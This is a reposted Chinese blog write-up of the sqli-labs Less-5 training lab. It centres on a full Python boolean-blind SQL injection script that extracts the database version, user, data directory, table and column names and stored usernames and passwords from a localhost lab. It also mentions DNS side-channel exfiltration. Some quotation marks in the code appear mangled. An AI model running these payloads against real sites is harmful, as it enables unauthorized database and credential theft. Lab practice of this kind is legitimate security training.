首页 > 数据库技术 > 详细

sqli-labs:5-,基于报错的注入

时间:2019-03-24 01:27:20      阅读:489      评论:0      收藏:0      [点我收藏+]

 

 

思考1:当# --+都被过滤时,只能考虑闭合处理

思考2:union联合注入时必须先判断字段长度

eg. id=1‘ order by 3 and ‘1‘=‘1

 

sqli5:

首先判断出对id经过了‘处理

其次发现结果不再回显

ok那就盲注了,先判断mysql版本,版本过低可优先考虑dns边信道攻击。

bool盲注的脚本

技术分享图片
  1 # -*- coding: utf-8 -*-
  2 """
  3 Created on Sat Mar 23 16:03:43 2019
  4 
  5 @author: kenshin
  6 """
  7 
  8 import requests,re
  9 url = http://localhost/sqli-labs/Less-5/?id=1
 10 pattern_mark = You are in...........
 11 
 12 def get_version(url):
 13     #mysql版本标准:x.x.xx
 14     #假设lstsion长度为5
 15     lst = [# for x in range(0, 5)]
 16     lst[1] = lst[3] = .
 17     for i in (1,3,5,6):
 18         for ii in range(48,58):
 19             payload = "\‘ and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"
 20             url_new = url + payload
 21             r = requests.get(url_new)
 22             if(re.findall(pattern_mark,r.text)):
 23                 lst[i-1] = str(ii-48)
 24                 break
 25     sr = ‘‘.join(lst)
 26     print("the lstsion of mysql:"+sr)
 27 
 28 def get_user(url):
 29     #假设user()长度为15
 30     lst = [# for x in range(0,15)]
 31     for i in range(1,16):
 32         for ii in qwertyuiopasdfghjklzxcvbnm1234567890_-@:
 33             payload = "\‘ and substr((select user()),"+str(i)+",1)=‘"+ii+"‘ --+"
 34             url_new = url + payload
 35             r = requests.get(url_new)
 36             if(re.findall(pattern_mark,r.text)):
 37                 lst[i-1] = ii
 38                 print(ii)
 39                 break
 40     sr = ‘‘.join(lst)
 41     print("the user of database: "+sr)
 42     
 43 def get_datadir(url):
 44     #假设@@datadir长度为32
 45     lst = [# for x in range(0,32)]
 46     for i in range(1,33):
 47         for ii in :\\qwertyuiopasdfghjklzxcvbnm1234567890_-:
 48             payload = "\‘ and substr((select @@datadir),"+str(i)+",1)=‘"+ii+"‘ --+"
 49             url_new = url + payload
 50             r = requests.get(url_new)
 51             if(re.findall(pattern_mark,r.text)):
 52                 lst[i-1] = ii
 53                 print(ii)
 54                 break
 55     sr = ‘‘.join(lst)
 56     print(sr)
 57     
 58 def get_currTB(url):
 59     #假设当前数据库最多有10个表[i标识]
 60     for i in range(0,10):
 61         #假设最长的表名长度为10[ii标识]
 62         lst = [# for x in range(0,10)]
 63         for ii in range(1,11):
 64             for iii in qwertyuiopasdfghjklzxcvbnm1234567890_-#:
 65                 payload = "\‘ and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
 66                 url_new = url + payload
 67                 r = requests.get(url_new)
 68                 if(re.findall(pattern_mark,r.text)):
 69                     lst[ii-1] = iii
 70                     print(iii)
 71                     break
 72             if(lst[ii-1] == #):
 73                break
 74         sr = ‘‘.join(lst)
 75         print(sr)
 76 
 77 def get_Column(url,tb):
 78     #假设当前列最多有3个字段[i标识]
 79     for i in range(0,3):
 80         #假设每个字段最长的数据长度为10
 81         lst = [# for x in range(0,10)]
 82         for ii in range(1,11):
 83             for iii in @qwertyuiopasdfghjklzxcvbnm1234567890_-#:
 84                 payload = "\‘ and substr((select column_name from information_schema.columns where table_name=‘"+tb+"‘ limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
 85                 url_new = url + payload
 86                 r = requests.get(url_new)
 87                 if(re.findall(pattern_mark,r.text)):
 88                     lst[ii-1] = iii
 89                     print(iii)
 90                     break
 91             if(lst[ii-1] == #):
 92                break
 93         sr = ‘‘.join(lst)
 94         print(sr)
 95 def get_data(url):
 96     #假设当前列有10条数据[i标识]
 97     for i in range(1,11):
 98         #假设每条数据最长的数据长度为25
 99         lst = [# for x in range(0,25)]
100         for ii in range(1,26):
101             for iii in %@qwertyuiopasdfghjklzxcvbnm1234567890_-#:
102             #变量太多,payload一些变量在代码端自行设置TT
103                 payload = "‘ and substr((select group_concat(id,‘%‘,username,‘%‘,password) from security.users where id="+str(i)+"),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
104                 url_new = url + payload
105                 r = requests.get(url_new)
106                 if(re.findall(pattern_mark,r.text)):
107                     lst[ii-1] = iii
108                     print(iii)
109                     break
110             if(lst[ii-1] == #):
111                break
112         sr = ‘‘.join(lst)
113         print(sr)
114 """
115 dnslog
116 """
117 
118 
119 #get_lstsion(url)
120 #get_user(url)
121 #get_datadir(url)
122 #get_currTB(url)
123 #tb = input("select table >> ")
124 #get_Column(url,tb)
125 get_data(url)
bool型盲注脚本

 技术分享图片

技术分享图片

技术分享图片

 技术分享图片

技术分享图片

 技术分享图片

 

sqli-labs:5-,基于报错的注入

原文:https://www.cnblogs.com/p0pl4r/p/10584953.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!